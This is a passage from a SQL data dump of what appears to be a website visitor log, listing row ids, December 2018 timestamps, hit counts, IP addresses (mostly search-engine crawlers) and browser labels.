1544378440,1,1,0,0,'54.36.148.79','other'),(348989,1544378671,1,1,0,0,'46.229.168.143','other'),(348990,1544378713,1,1,0,0,'54.36.148.169','other'),(348991,1544379147,1,1,0,0,'46.229.168.153','other'),(348992,1544379197,1,1,0,0,'95.108.213.4','other'),(348993,1544379319,1,1,0,0,'54.36.148.146','other'),(348994,1544379824,1,1,0,0,'54.36.148.218','other'),(348995,1544380226,1,1,0,0,'46.229.168.132','other'),(348996,1544380230,1,1,0,0,'46.229.168.149','other'),(348997,1544380358,1,1,0,0,'54.36.148.236','other'),(348998,1544380848,1,1,0,0,'54.36.148.207','other'),(348999,1544380910,1,1,0,0,'54.36.149.20','other'),(349000,1544380963,1,1,0,0,'8.29.198.26','other'),(349001,1544381164,1,1,0,0,'54.36.149.87','other'),(349002,1544381294,1,1,0,0,'54.36.149.72','other'),(349003,1544381596,2,2,0,0,'54.36.149.86','other'),(349004,1544381673,1,1,0,0,'46.211.46.11','chrome'),(349005,1544382224,1,1,0,0,'54.36.148.147','other'),(349006,1544382269,1,1,0,0,'46.229.168.153','other'),(349007,1544382595,1,1,0,0,'46.229.168.138','other'),(349008,1544382599,1,1,0,0,'46.229.168.132','other'),(349009,1544382668,1,1,0,0,'54.36.148.155','other'),(349010,1544382934,1,1,0,0,'8.29.198.25','other'),(349011,1544382942,1,1,0,0,'8.29.198.26','other'),(349012,1544383325,1,1,0,0,'46.229.168.135','other'),(349013,1544383378,1,1,0,0,'5.255.253.38','other'),(349014,1544383379,1,1,0,0,'141.8.142.144','other'),(349017,1544383519,1,1,0,0,'46.229.168.136','other'),(349018,1544383524,2,2,0,0,'46.229.168.143','other'),(349019,1544383761,1,1,0,0,'188.163.52.141','firefox'),(349020,1544383833,1,1,0,0,'54.36.149.20','other'),(349021,1544383875,1,1,0,0,'54.36.148.122','other'),(349022,1544384140,1,1,0,0,'54.36.149.75','other'),(349023,1544384185,1,1,0,0,'46.229.168.140','other'),(349024,1544384257,1,1,0,0,'194.44.175.254','msie'),(349025,1544384415,1,1,0,0,'54.36.149.86','other'),(349026,1544384547,1,1,0,0,'54.36.148.18','other'),(349027,1544384758,1,1,0,0,'54.36.149.76','other'),(349028,1544384979,1,1,0,0,'66.249.75.21','chrome'),(349029,1544384985,1,1,0,0,'46.229.168.134','other'),(349030,1544385035,1,1,0,0,'46.229.168.150','other'),(349031,1544385064,1,1,0,0,'54.36.148.70','other'),(349032,1544385109,1,1,0,0,'46.229.168.143','other'),(349033,1544386143,1,1,0,0,'46.229.168.154','other'),(349034,1544386448,1,1,0,0,'54.36.149.72','other'),(349035,1544386529,1,1,0,0,'54.36.149.84','other'),(349036,1544386767,1,1,0,0,'46.229.168.147','other'),(349037,1544386855,1,1,0,0,'54.36.148.233','other'),(349038,1544387065,1,1,0,0,'207.46.13.212','other'),(349039,1544387873,1,1,0,0,'54.36.148.196','other'),(349040,1544387898,1,1,0,0,'54.36.148.113','other'),(349041,1544388041,1,1,0,0,'66.249.75.21','chrome'),(349042,1544388165,1,1,0,0,'54.36.148.189','other'),(349043,1544388438,1,1,0,0,'54.36.148.129','other'),(349044,1544388474,1,1,0,0,'54.36.149.96','other'),(349045,1544388750,1,1,0,0,'54.36.149.99','other'),(349046,1544388912,1,1,0,0,'46.229.168.140','other'),(349047,1544389277,1,1,0,0,'66.249.69.217','chrome'),(349048,1544389334,1,1,0,0,'66.249.69.204','chrome'),(349049,1544389343,1,1,0,0,'54.36.148.23','other'),(349050,1544389383,1,1,0,0,'66.249.75.16','chrome'),(349051,1544389409,2,2,0,0,'66.249.75.20','chrome'),(349052,1544389560,1,1,0,0,'54.36.148.56','other'),(349053,1544389599,3,3,0,0,'40.77.167.165','other'),(349054,1544389703,1,1,0,0,'54.36.148.170','other'),(349055,1544389750,1,1,0,0,'66.249.75.15','chrome'),(349056,1544389778,1,1,0,0,'54.36.149.85','other'),(349057,1544390070,7,7,0,0,'178.154.244.11','other'),(349058,1544390131,3,3,0,0,'5.45.207.19','other'),(349059,1544390254,1,1,0,0,'46.229.168.138','other'),(349060,1544390311,1,1,0,0,'46.229.168.153','other'),(349061,1544390408,5,5,0,0,'95.108.213.4','other'),(349062,1544390464,5,5,0,0,'5.45.207.79','other'),(349063,1544390688,1,1,0,0,'54.36.148.22','other'),(349064,1544390821,1,1,0,0,'178.154.244.49','other'),(349065,1544390826,2,2,0,0,'66.249.75.16','chrome'),(349066,1544390861,1,1,0,0,'54.36.148.174','other'),(349067,1544390885,2,2,0,0,'66.249.75.21','chrome'),(349068,1544390923,1,1,0,0,'54.36.148.143','other'),(349069,1544390987,1,1,0,0,'5.255.253.38','other'),(349070,1544391053,6,6,0,0,'178.154.244.11','other'),(349071,1544391392,5,5,0,0,'141.8.142.103','other'),(349072,1544391598,1,1,0,0,'5.45.207.79','other'),(349073,1544391779,1,1,0,0,'54.36.148.36','other'),(349074,1544391815,1,1,0,0,'8.29.198.26','other'),(349075,1544391984,1,1,0,0,'54.36.149.63','other'),(349076,1544392350,2,2,0,0,'207.46.13.19','other'),(349077,1544392522,1,1,0,0,'5.45.207.79','other'),(349078,1544392605,1,1,0,0,'54.36.148.170','other'),(349079,1544392618,1,1,0,0,'54.36.149.96','other'),(349080,1544393361,1,1,0,0,'46.229.168.145','other'),(349081,1544393365,1,1,0,0,'46.229.168.137','other'),(349082,1544393781,2,2,0,0,'8.29.198.26','other'),(349083,1544394043,1,1,0,0,'66.249.69.217','chrome'),(349084,1544394381,1,1,0,0,'66.249.69.204','chrome'),(349085,1544394432,1,1,0,0,'46.229.168.144','other'),(349086,1544394436,1,1,0,0,'46.229.168.147','other'),(349087,1544395280,1,1,0,0,'40.77.167.165','other'),(349088,1544395326,1,1,0,0,'54.36.149.93','other'),(349089,1544395623,1,1,0,0,'40.77.167.179','other'),(349090,1544395902,1,1,0,0,'54.36.148.97','other'),(349091,1544397606,1,1,0,0,'54.36.149.41','other'),(349092,1544398159,1,1,0,0,'54.36.148.213','other'),(349093,1544398248,1,1,0,0,'5.45.207.79','other'),(349094,1544398359,1,1,0,0,'54.36.148.75','other'),(349095,1544398441,1,1,0,0,'54.36.148.113','other'),(349096,1544398665,1,1,0,0,'46.229.168.151','other'),(349097,1544398688,1,1,0,0,'40.77.167.165','other'),(349098,1544398763,1,1,0,0,'54.36.148.255','other'),(349099,1544399173,1,1,0,0,'54.36.149.74','other'),(349100,1544399419,1,1,0,0,'54.36.148.186','other'),(349101,1544399528,1,1,0,0,'54.36.148.220','other'),(349102,1544399647,1,1,0,0,'46.229.168.154','other'),(349103,1544400600,1,1,0,0,'54.36.148.218','other'),(349104,1544400694,1,1,0,0,'54.36.148.179','other'),(349105,1544400756,1,1,0,0,'141.8.142.103','other'),(349106,1544400854,1,1,0,0,'54.36.148.49','other'),(349107,1544400865,1,1,0,0,'54.36.149.69','other'),(349108,1544400959,1,1,0,0,'46.229.168.144','other'),(349109,1544401215,1,1,0,0,'54.36.148.110','other'),(349110,1544401504,1,1,0,0,'40.77.167.145','other'),(349111,1544401626,1,1,0,0,'66.249.75.22','chrome'),(349112,1544402175,1,1,0,0,'46.229.168.148','other'),(349113,1544402407,1,1,0,0,'66.249.69.200','chrome'),(349114,1544402651,1,1,0,0,'8.29.198.26','other'),(349115,1544402724,1,1,0,0,'54.36.149.62','other'),(349116,1544402746,1,1,0,0,'54.36.148.76','other'),(349117,1544403080,1,1,0,0,'54.36.148.217','other'),(349118,1544403132,1,1,0,0,'54.36.148.237','other'),(349119,1544403342,1,1,0,0,'46.229.168.145','other'),(349120,1544403402,1,1,0,0,'37.59.112.7','other'),(349121,1544403783,1,1,0,0,'54.36.148.255','other'),(349122,1544403915,1,1,0,0,'207.46.13.188','other'),(349123,1544404253,1,1,0,0,'5.188.210.53','chrome'),(349124,1544404337,2,2,0,0,'95.108.213.4','other'),(349125,1544404352,1,1,0,0,'46.229.168.133','other'),(349126,1544404364,6,6,0,0,'178.154.244.11','other'),(349127,1544404538,3,3,0,0,'5.45.207.19','other'),(349128,1544404615,2,2,0,0,'8.29.198.27','other'),(349129,1544404815,1,1,0,0,'157.55.39.140','other'),(349130,1544404824,1,1,0,0,'54.36.148.132','other'),(349131,1544404940,7,7,0,0,'5.45.207.79','other'),(349132,1544405015,2,2,0,0,'87.250.224.47','other'),(349133,1544405058,3,3,0,0,'141.8.142.103','other'),(349134,1544405232,1,1,0,0,'54.36.149.78','other'),(349135,1544405256,1,1,0,0,'54.36.149.102','other'),(349136,1544405339,1,1,0,0,'54.36.149.75','other'),(349137,1544405356,1,1,0,0,'54.36.148.162','other'),(349138,1544405495,2,2,0,0,'5.45.207.19','other'),(349139,1544405589,1,1,0,0,'46.229.168.130','other'),(349140,1544405776,1,1,0,0,'40.77.167.145','other'),(349141,1544405779,4,4,0,0,'95.108.213.4','other'),(349142,1544405800,3,3,0,0,'178.154.244.11','other'),(349143,1544405892,2,2,0,0,'5.45.207.79','other'),(349144,1544406189,1,1,0,0,'141.8.142.103','other'),(349145,1544406272,1,1,0,0,'54.36.148.86','other'),(349146,1544406499,1,1,0,0,'37.9.113.20','other'),(349147,1544406503,2,2,0,0,'66.249.69.200','chrome'),(349148,1544406563,5,5,0,0,'5.45.207.19','other'),(349149,1544406631,1,1,0,0,'54.36.148.128','other'),(349150,1544406647,1,1,0,0,'46.229.168.154','other'),(349151,1544406766,15,15,0,0,'144.76.14.153','other'),(349152,1544406803,2,2,0,0,'5.45.207.79','other'),(349153,1544406892,1,1,0,0,'54.36.148.244','other'),(349154,1544407120,1,1,0,0,'46.229.168.139','other'),(349155,1544407238,1,1,0,0,'178.154.244.11','other'),(349156,1544407245,1,1,0,0,'54.36.148.219','other'),(349157,1544407273,1,1,0,0,'54.36.148.250','other'),(349158,1544407546,1,1,0,0,'46.229.168.140','other'),(349159,1544408185,1,1,0,0,'40.77.167.99','other'),(349160,1544408236,1,1,0,0,'54.36.148.178','other'),(349161,1544408258,1,1,0,0,'46.229.168.154','other'),(349162,1544408707,1,1,0,0,'54.36.148.193','other'),(349163,1544408913,1,1,0,0,'54.36.148.82','other'),(349164,1544409003,18,18,0,0,'78.46.85.236','other'),(349165,1544409076,1,1,0,0,'54.36.149.75','other'),(349166,1544409126,1,1,0,0,'66.249.69.202','chrome'),(349167,1544409692,2,2,0,0,'141.8.142.103','other'),(349169,1544409696,1,1,0,0,'178.154.244.11','other'),(349170,1544409710,1,1,0,0,'54.36.148.126','other'),(349171,1544409862,1,1,0,0,'54.36.149.98','other'),(349172,1544409917,1,1,0,0,'157.55.39.140','other'),(349173,1544409983,1,1,0,0,'54.36.148.180','other'),(349174,1544410131,1,1,0,0,'54.36.149.61','other'),(349175,1544410157,1,1,0,0,'54.36.148.89','other'),(349176,1544410369,1,1,0,0,'54.36.148.29','other'),(349177,1544410615,1,1,0,0,'46.229.168.154','other'),(349178,1544410690,1,1,0,0,'66.249.75.22','chrome'),(349179,1544410754,1,1,0,0,'66.249.75.17','chrome'),(349180,1544410807,1,1,0,0,'66.249.69.150','chrome'),(349181,1544410863,1,1,0,0,'54.36.148.232','other'),(349182,1544411048,1,1,0,0,'46.229.168.143','other'),(349183,1544411099,1,1,0,0,'54.36.148.166','other'),(349184,1544411244,1,1,0,0,'54.36.148.179','other'),(349185,1544411536,1,1,0,0,'54.36.149.100','other'),(349186,1544412083,1,1,0,0,'40.77.167.99','other'),(349187,1544412130,1,1,0,0,'54.36.148.202','other'),(349188,1544412464,1,1,0,0,'46.229.168.149','other'),(349189,1544412717,1,1,0,0,'54.36.149.85','other'),(349190,1544412997,1,1,0,0,'178.154.244.11','other'),(349191,1544413079,2,2,0,0,'5.45.207.19','other'),(349192,1544413259,1,1,0,0,'141.8.142.103','other'),(349193,1544413489,1,1,0,0,'8.29.198.25','other'),(349194,1544413810,1,1,0,0,'54.36.148.39','other'),(349195,1544413900,1,1,0,0,'54.36.148.147','other'),(349196,1544414270,1,1,0,0,'46.229.168.132','other'),(349197,1544414619,1,1,0,0,'54.36.148.240','other'),(349198,1544414821,1,1,0,0,'54.36.149.25','other'),(349199,1544414908,1,1,0,0,'54.36.148.33','other'),(349200,1544414926,1,1,0,0,'46.229.168.146','other'),(349201,1544415378,1,1,0,0,'54.36.148.254','other'),(349202,1544415450,1,1,0,0,'8.29.198.25','other'),(349203,1544415455,1,1,0,0,'8.29.198.27','other'),(349204,1544415869,1,1,0,0,'54.36.148.146','other'),(349205,1544416464,1,1,0,0,'54.36.148.71','other'),(349206,1544416551,1,1,0,0,'46.229.168.149','other'),(349207,1544416875,1,1,0,0,'54.36.149.103','other'),(349208,1544417192,1,1,0,0,'87.250.224.47','other'),(349209,1544417702,1,1,0,0,'54.36.149.53','other'),(349210,1544418361,1,1,0,0,'87.250.224.47','other'),(349211,1544418463,1,1,0,0,'54.69.69.34','chrome'),(349212,1544418521,1,1,0,0,'54.36.149.26','other'),(349213,1544418873,6,6,0,0,'178.154.244.11','other'),(349214,1544419027,1,1,0,0,'95.108.213.4','other'),(349215,1544419095,4,4,0,0,'5.45.207.19','other'),(349216,1544419309,1,1,0,0,'54.36.149.49','other'),(349217,1544419310,1,1,0,0,'87.250.224.47','other'),(349218,1544419413,1,1,0,0,'54.36.148.25','other'),(349219,1544419785,6,6,0,0,'178.154.244.11','other'),(349220,1544419891,1,1,0,0,'46.229.168.132','other'),(349221,1544419895,1,1,0,0,'46.229.168.153','other'),(349222,1544419951,1,1,0,0,'66.249.75.17','chrome'),(349223,1544420039,1,1,0,0,'66.249.75.20','chrome'),(349224,1544420042,1,1,0,0,'66.249.75.21','chrome'),(349225,1544420092,1,1,0,0,'66.249.69.204','chrome'),(349226,1544420118,1,1,0,0,'141.8.142.103','other'),(349227,1544420131,1,1,0,0,'54.36.148.177','other'),(349228,1544420745,1,1,0,0,'95.108.213.4','other'),(349229,1544421189,1,1,0,0,'54.36.148.229','other'),(349230,1544421218,1,1,0,0,'46.229.168.142','other'),(349231,1544421222,1,1,0,0,'46.229.168.135','other'),(349232,1544421262,1,1,0,0,'5.45.207.19','other'),(349233,1544421264,1,1,0,0,'54.36.148.233','other'),(349234,1544421288,1,1,0,0,'87.250.224.47','other'),(349235,1544421432,1,1,0,0,'46.229.168.133','other'),(349236,1544421602,1,1,0,0,'91.196.178.170','chrome'),(349237,1544421792,1,1,0,0,'54.36.149.87','other'),(349238,1544421825,1,1,0,0,'66.249.75.16','chrome'),(349239,1544421871,2,2,0,0,'66.249.75.20','chrome'),(349240,1544422003,1,1,0,0,'66.249.75.15','chrome'),(349241,1544422941,1,1,0,0,'54.36.149.64','other'),(349242,1544423377,3,3,0,0,'46.33.49.91','chrome'),(349243,1544423493,1,1,0,0,'54.36.149.81','other'),(349244,1544423631,1,1,0,0,'94.180.150.211','msie'),(349245,1544423638,1,1,0,0,'54.36.148.96','other'),(349246,1544423805,1,1,0,0,'54.36.148.217','other'),(349247,1544423828,2,2,0,0,'176.108.15.57','chrome'),(349248,1544423935,1,1,0,0,'91.196.178.94','chrome'),(349249,1544423991,1,1,0,0,'46.229.168.146','other'),(349250,1544424075,1,1,0,0,'54.36.148.175','other'),(349251,1544424302,1,1,0,0,'54.36.149.62','other'),(349252,1544424330,1,1,0,0,'8.29.198.25','other'),(349253,1544424443,1,1,0,0,'54.36.149.96','other'),(349254,1544424539,1,1,0,0,'54.36.149.7','other'),(349255,1544424566,1,1,0,0,'54.36.148.48','other'),(349256,1544424793,2,2,0,0,'91.196.178.93','firefox'),(349257,1544424808,1,1,0,0,'178.93.61.130','chrome'),(349258,1544424834,1,1,0,0,'66.249.69.145','chrome'),(349259,1544424835,1,1,0,0,'66.249.69.150','chrome'),(349260,1544424873,1,1,0,0,'54.36.149.84','other'),(349261,1544425232,1,1,0,0,'54.36.148.60','other'),(349262,1544425409,1,1,0,0,'54.36.148.173','other'),(349263,1544425429,1,1,0,0,'66.249.69.143','chrome'),(349264,1544425433,2,2,0,0,'66.249.69.148','chrome'),(349265,1544425966,1,1,0,0,'54.36.148.107','other'),(349266,1544426046,1,1,0,0,'54.36.149.60','other'),(349267,1544426102,1,1,0,0,'54.36.148.255','other'),(349268,1544426144,1,1,0,0,'54.36.148.246','other'),(349269,1544426280,1,1,0,0,'8.29.198.27','other'),(349270,1544426298,1,1,0,0,'8.29.198.26','other'),(349271,1544426532,1,1,0,0,'54.36.148.125','other'),(349272,1544426666,1,1,0,0,'91.196.178.93','firefox'),(349273,1544426672,1,1,0,0,'66.249.69.143','chrome'),(349274,1544426683,2,2,0,0,'91.196.178.94','chrome'),(349275,1544426692,1,1,0,0,'66.249.69.148','chrome'),(349276,1544426960,1,1,0,0,'54.36.148.156','other'),(349277,1544426998,1,1,0,0,'54.36.149.60','other'),(349278,1544427157,1,1,0,0,'46.175.67.103','chrome'),(349279,1544427350,1,1,0,0,'54.36.148.251','other'),(349280,1544427409,1,1,0,0,'46.229.168.138','other'),(349281,1544427562,1,1,0,0,'46.229.168.143','other'),(349282,1544427638,1,1,0,0,'54.36.148.112','other'),(349283,1544427974,1,1,0,0,'54.36.148.224','other'),(349284,1544428129,3,3,0,0,'66.249.69.143','chrome'),(349285,1544428131,1,1,0,0,'66.249.69.145','chrome'),(349286,1544428151,2,2,0,0,'66.249.69.150','chrome'),(349287,1544428154,3,3,0,0,'66.249.69.149','chrome'),(349288,1544428213,1,1,0,0,'54.36.149.77','other'),(349289,1544428267,2,2,0,0,'66.249.69.219','chrome'),(349290,1544428287,3,3,0,0,'66.249.69.200','chrome'),(349291,1544428306,2,2,0,0,'40.77.167.75','other'),(349292,1544428321,2,2,0,0,'66.249.69.144','chrome'),(349293,1544428371,2,2,0,0,'66.249.69.148','chrome'),(349294,1544428434,1,1,0,0,'91.196.177.8','chrome'),(349295,1544428489,1,1,0,0,'37.52.154.15','chrome'),(349296,1544428514,2,2,0,0,'207.46.13.204','other'),(349297,1544428536,1,1,0,0,'46.229.168.141','other'),(349298,1544428645,1,1,0,0,'193.104.213.101','other'),(349299,1544428762,2,2,0,0,'157.55.39.149','other'),(349300,1544428913,2,2,0,0,'66.249.69.202','chrome'),(349301,1544429054,1,1,0,0,'54.36.148.59','other'),(349302,1544429118,1,1,0,0,'66.249.69.150','chrome'),(349303,1544429165,1,1,0,0,'109.229.18.67','firefox'),(349304,1544429362,1,1,0,0,'54.36.148.216','other'),(349305,1544429458,1,1,0,0,'87.250.224.47','other'),(349306,1544429727,1,1,0,0,'54.36.148.26','other'),(349307,1544429739,2,2,0,0,'66.249.69.143','chrome'),(349308,1544429760,2,2,0,0,'66.249.69.149','chrome'),(349309,1544429882,1,1,0,0,'141.8.142.103','other'),(349310,1544429961,1,1,0,0,'178.154.244.11','other'),(349311,1544429982,1,1,0,0,'54.36.148.202','other'),(349312,1544430204,2,2,0,0,'66.249.69.148','chrome'),(349313,1544430219,1,1,0,0,'37.9.113.20','other'),(349314,1544430320,1,1,0,0,'54.36.148.190','other'),(349315,1544430405,1,1,0,0,'54.36.148.188','other'),(349316,1544430551,1,1,0,0,'5.45.207.19','other'),(349317,1544430571,1,1,0,0,'46.229.168.138','other'),(349318,1544430572,2,2,0,0,'66.249.69.144','chrome'),(349319,1544430642,1,1,0,0,'91.124.31.136','chrome'),(349320,1544430842,2,2,0,0,'66.249.69.145','chrome'),(349321,1544430860,2,2,0,0,'66.249.69.149','chrome'),(349322,1544430887,1,1,0,0,'66.249.69.143','chrome'),(349323,1544430906,1,1,0,0,'66.249.69.150','chrome'),(349324,1544430975,1,1,0,0,'54.36.148.104','other'),(349325,1544430979,2,2,0,0,'91.124.182.170','firefox'),(349326,1544430982,1,1,0,0,'66.249.69.204','chrome'),(349327,1544431091,1,1,0,0,'95.108.213.4','other'),(349328,1544431132,2,2,0,0,'141.8.142.103','other'),(349329,1544431193,3,3,0,0,'91.196.178.94','chrome'),(349330,1544431340,3,3,0,0,'91.196.179.134','chrome'),(349331,1544431478,2,2,0,0,'91.196.178.189','chrome'),(349332,1544431483,1,1,0,0,'167.114.233.118','firefox'),(349333,1544431662,1,1,0,0,'54.36.149.39','other'),(349334,1544431952,1,1,0,0,'66.249.69.145','chrome'),(349335,1544431969,1,1,0,0,'54.36.148.134','other'),(349336,1544431974,2,2,0,0,'66.249.69.149','chrome'),(349337,1544432040,1,1,0,0,'54.36.149.65','other'),(349338,1544432392,1,1,0,0,'54.36.149.41','other'),(349339,1544432558,1,1,0,0,'54.36.148.189','other'),(349340,1544432962,4,4,0,0,'66.249.69.148','chrome'),(349341,1544433392,1,1,0,0,'54.36.148.241','other'),(349342,1544433405,1,1,0,0,'213.5.192.4','chrome'),(349343,1544433443,1,1,0,0,'66.249.69.144','chrome'),(349344,1544433463,1,1,0,0,'66.249.69.143','chrome'),(349345,1544433481,1,1,0,0,'66.249.69.149','chrome'),(349346,1544433626,1,1,0,0,'54.36.148.249','other'),(349347,1544433714,1,1,0,0,'157.55.39.149','other'),(349348,1544433768,1,1,0,0,'54.36.148.206','other'),(349349,1544433840,1,1,0,0,'178.154.244.11','other'),(349350,1544433848,2,2,0,0,'5.45.207.79','other'),(349351,1544433849,1,1,0,0,'37.9.113.148','other'),(349352,1544433929,1,1,0,0,'54.36.148.73','other'),(349353,1544433942,1,1,0,0,'54.36.149.30','other'),(349354,1544434123,1,1,0,0,'54.36.148.208','other'),(349355,1544434174,1,1,0,0,'66.249.69.150','chrome'),(349356,1544434287,1,1,0,0,'54.36.148.213','other'),(349357,1544434464,1,1,0,0,'5.58.84.94','firefox'),(349358,1544435169,1,1,0,0,'8.29.198.25','other'),(349359,1544435184,1,1,0,0,'54.36.149.41','other'),(349360,1544435349,2,2,0,0,'66.249.69.204','chrome'),(349361,1544435415,4,4,0,0,'91.196.178.49','chrome'),(349362,1544435432,1,1,0,0,'66.249.69.145','chrome'),(349363,1544435439,1,1,0,0,'66.249.69.221','chrome'),(349364,1544435451,2,2,0,0,'66.249.69.149','chrome'),(349365,1544435457,2,2,0,0,'66.249.69.200','chrome'),(349366,1544435480,2,2,0,0,'91.209.11.236','other'),(349367,1544435510,2,2,0,0,'87.250.224.47','other'),(349368,1544435533,2,2,0,0,'5.45.207.19','other'),(349369,1544435607,5,5,0,0,'5.45.207.79','other'),(349370,1544435733,1,1,0,0,'54.36.148.203','other'),(349371,1544435780,1,1,0,0,'5.196.87.58','other'),(349372,1544435783,1,1,0,0,'54.36.148.67','other'),(349373,1544435827,1,1,0,0,'66.249.69.143','chrome'),(349374,1544435893,1,1,0,0,'66.249.69.150','chrome'),(349375,1544436007,2,2,0,0,'141.8.142.103','other'),(349376,1544436230,1,1,0,0,'54.36.148.113','other'),(349377,1544436390,5,5,0,0,'178.154.244.11','other'),(349378,1544436521,8,8,0,0,'5.45.207.79','other'),(349379,1544436551,2,2,0,0,'95.108.213.4','other'),(349380,1544436869,1,1,0,0,'95.108.181.54','other'),(349381,1544436958,3,3,0,0,'195.10.210.49','chrome'),(349382,1544437085,2,2,0,0,'5.45.207.19','other'),(349383,1544437115,1,1,0,0,'8.29.198.27','other'),(349384,1544437128,3,3,0,0,'87.250.224.47','other'),(349385,1544437139,1,1,0,0,'8.29.198.26','other'),(349386,1544437216,1,1,0,0,'66.249.69.143','chrome'),(349387,1544437234,2,2,0,0,'66.249.69.149','chrome'),(349388,1544437405,6,6,0,0,'178.154.244.11','other'),(349389,1544437436,1,1,0,0,'218.30.103.92','other'),(349390,1544437485,4,4,0,0,'5.45.207.79','other'),(349391,1544437599,2,2,0,0,'95.108.213.4','other'),(349392,1544437824,1,1,0,0,'66.249.69.148','chrome'),(349393,1544437830,1,1,0,0,'157.55.39.81','other'),(349394,1544437831,1,1,0,0,'54.36.149.70','other'),(349395,1544437844,1,1,0,0,'46.229.168.154','other'),(349396,1544437885,1,1,0,0,'157.55.39.149','other'),(349397,1544437961,1,1,0,0,'54.36.148.134','other'),(349398,1544438212,1,1,0,0,'46.229.168.129','other'),(349399,1544438216,1,1,0,0,'54.36.149.27','other'),(349400,1544438337,6,6,0,0,'178.154.244.11','other'),(349401,1544438427,5,5,0,0,'5.45.207.19','other'),(349402,1544438441,1,1,0,0,'207.46.13.12','other'),(349403,1544438446,1,1,0,0,'157.55.39.140','other'),(349404,1544438494,1,1,0,0,'87.250.224.47','other'),(349405,1544438539,1,1,0,0,'54.36.148.156','other'),(349406,1544438567,2,2,0,0,'141.8.142.103','other'),(349407,1544438623,4,4,0,0,'94.100.221.234','chrome'),(349408,1544438835,1,1,0,0,'5.45.207.79','other'),(349409,1544438964,1,1,0,0,'95.108.213.4','other'),(349410,1544438983,1,1,0,0,'46.174.125.28','chrome'),(349411,1544439025,1,1,0,0,'54.36.148.61','other'),(349412,1544439514,1,1,0,0,'46.229.168.148','other'),(349413,1544439595,1,1,0,0,'66.249.75.21','chrome'),(349414,1544439688,1,1,0,0,'66.249.75.17','chrome'),(349415,1544439779,3,3,0,0,'66.249.75.20','chrome'),(349416,1544439784,1,1,0,0,'66.249.69.144','chrome'),(349417,1544440009,1,1,0,0,'66.249.69.204','chrome'),(349418,1544440025,1,1,0,0,'66.249.69.145','chrome'),(349419,1544440360,3,3,0,0,'195.10.210.49','chrome'),(349420,1544440491,1,1,0,0,'213.108.43.144','other'),(349421,1544440661,1,1,0,0,'157.55.39.149','other'),(349422,1544440770,2,2,0,0,'34.216.180.93','chrome'),(349423,1544440777,1,1,0,0,'213.108.43.144','chrome'),(349424,1544440891,1,1,0,0,'54.36.149.34','other'),(349425,1544440960,1,1,0,0,'54.36.148.161','other'),(349426,1544441175,1,1,0,0,'54.36.148.201','other'),(349427,1544441402,6,6,0,0,'213.108.44.26','chrome'),(349428,1544441832,2,2,0,0,'91.196.178.168','chrome'),(349429,1544441994,1,1,0,0,'54.36.148.204','other'),(349430,1544442245,1,1,0,0,'54.36.149.91','other'),(349431,1544442334,1,1,0,0,'54.36.148.163','other'),(349432,1544442478,1,1,0,0,'54.36.148.203','other'),(349433,1544442704,1,1,0,0,'46.229.168.151','other'),(349434,1544443073,1,1,0,0,'46.229.168.136','other'),(349435,1544443236,1,1,0,0,'54.36.149.61','other'),(349436,1544443451,1,1,0,0,'207.46.13.83','other'),(349437,1544443504,1,1,0,0,'46.18.1.1','firefox'),(349438,1544443640,1,1,0,0,'95.163.255.159','other'),(349439,1544443644,1,1,0,0,'95.163.255.191','other'),(349440,1544443667,1,1,0,0,'46.229.168.133','other'),(349441,1544443670,1,1,0,0,'46.229.168.134','other'),(349442,1544443739,1,1,0,0,'220.243.136.48','chrome'),(349443,1544443742,1,1,0,0,'220.243.136.40','chrome'),(349444,1544443744,1,1,0,0,'220.243.135.24','chrome'),(349445,1544443766,1,1,0,0,'95.132.9.1','chrome'),(349446,1544443926,1,1,0,0,'54.36.148.108','other'),(349447,1544444015,2,2,0,0,'5.45.207.79','other'),(349448,1544444579,1,1,0,0,'77.111.244.74','chrome'),(349449,1544444598,2,2,0,0,'91.196.178.168','chrome'),(349450,1544444603,1,1,0,0,'77.111.247.171','chrome'),(349451,1544444640,1,1,0,0,'54.36.149.23','other'),(349452,1544444668,1,1,0,0,'165.227.216.205','other'),(349453,1544444831,1,1,0,0,'54.36.148.180','other'),(349454,1544445454,2,2,0,0,'95.132.8.175','firefox'),(349455,1544445662,1,1,0,0,'104.248.8.217','other'),(349456,1544445716,1,1,0,0,'54.36.148.231','other'),(349457,1544445772,2,2,0,0,'91.196.177.46','chrome'),(349458,1544445795,1,1,0,0,'170.130.1.122','chrome'),(349459,1544445918,1,1,0,0,'54.36.148.110','other'),(349460,1544446031,1,1,0,0,'178.154.244.11','other'),(349461,1544446056,1,1,0,0,'37.53.135.98','firefox'),(349462,1544446106,2,2,0,0,'46.133.94.184','chrome'),(349463,1544446438,2,2,0,0,'95.134.221.247','chrome'),(349464,1544446476,1,1,0,0,'54.36.149.34','other'),(349465,1544446779,1,1,0,0,'66.249.75.21','chrome'),(349466,1544446898,1,1,0,0,'66.249.75.15','chrome'),(349467,1544446955,1,1,0,0,'5.45.207.79','other'),(349468,1544446962,2,2,0,0,'178.154.244.11','other'),(349469,1544446977,1,1,0,0,'95.108.213.4','other'),(349470,1544447063,1,1,0,0,'54.36.148.179','other'),(349471,1544447101,1,1,0,0,'54.36.148.79','other'),(349472,1544447271,1,1,0,0,'178.92.132.198','chrome'),(349473,1544447351,1,1,0,0,'54.36.148.87','other'),(349474,1544447453,1,1,0,0,'46.229.168.154','other'),(349475,1544447569,1,1,0,0,'54.36.149.85','other'),(349476,1544447806,1,1,0,0,'54.36.149.0','other'),(349477,1544447875,1,1,0,0,'54.36.148.193','other'),(349478,1544447985,2,2,0,0,'8.29.198.26','other'),(349479,1544448178,1,1,0,0,'157.55.39.138','other'),(349480,1544448237,2,2,0,0,'109.122.61.29','chrome'),(349481,1544448277,1,1,0,0,'54.36.148.141','other'),(349482,1544448350,1,1,0,0,'54.36.148.107','other'),(349483,1544448359,1,1,0,0,'46.229.168.149','other'),(349484,1544448385,1,1,0,0,'54.36.148.156','other'),(349485,1544448464,1,1,0,0,'66.249.69.217','chrome'),(349486,1544448470,2,2,0,0,'46.174.125.28','chrome'),(349487,1544448578,1,1,0,0,'66.249.69.200','chrome'),(349488,1544448787,1,1,0,0,'66.249.75.21','chrome'),(349489,1544448987,1,1,0,0,'178.154.244.11','other'),(349490,1544449045,1,1,0,0,'54.36.148.166','other'),(349491,1544449507,1,1,0,0,'54.36.148.169','other'),(349492,1544449706,1,1,0,0,'5.45.207.79','other'),(349493,1544449847,1,1,0,0,'66.249.75.20','chrome'),(349494,1544449906,1,1,0,0,'54.36.149.7','other'),(349495,1544450036,1,1,0,0,'95.108.213.4','other'),(349496,1544450037,1,1,0,0,'193.24.220.146','chrome'),(349497,1544450083,1,1,0,0,'141.8.142.103','other'),(349498,1544450164,1,1,0,0,'37.9.113.148','other'),(349499,1544450285,1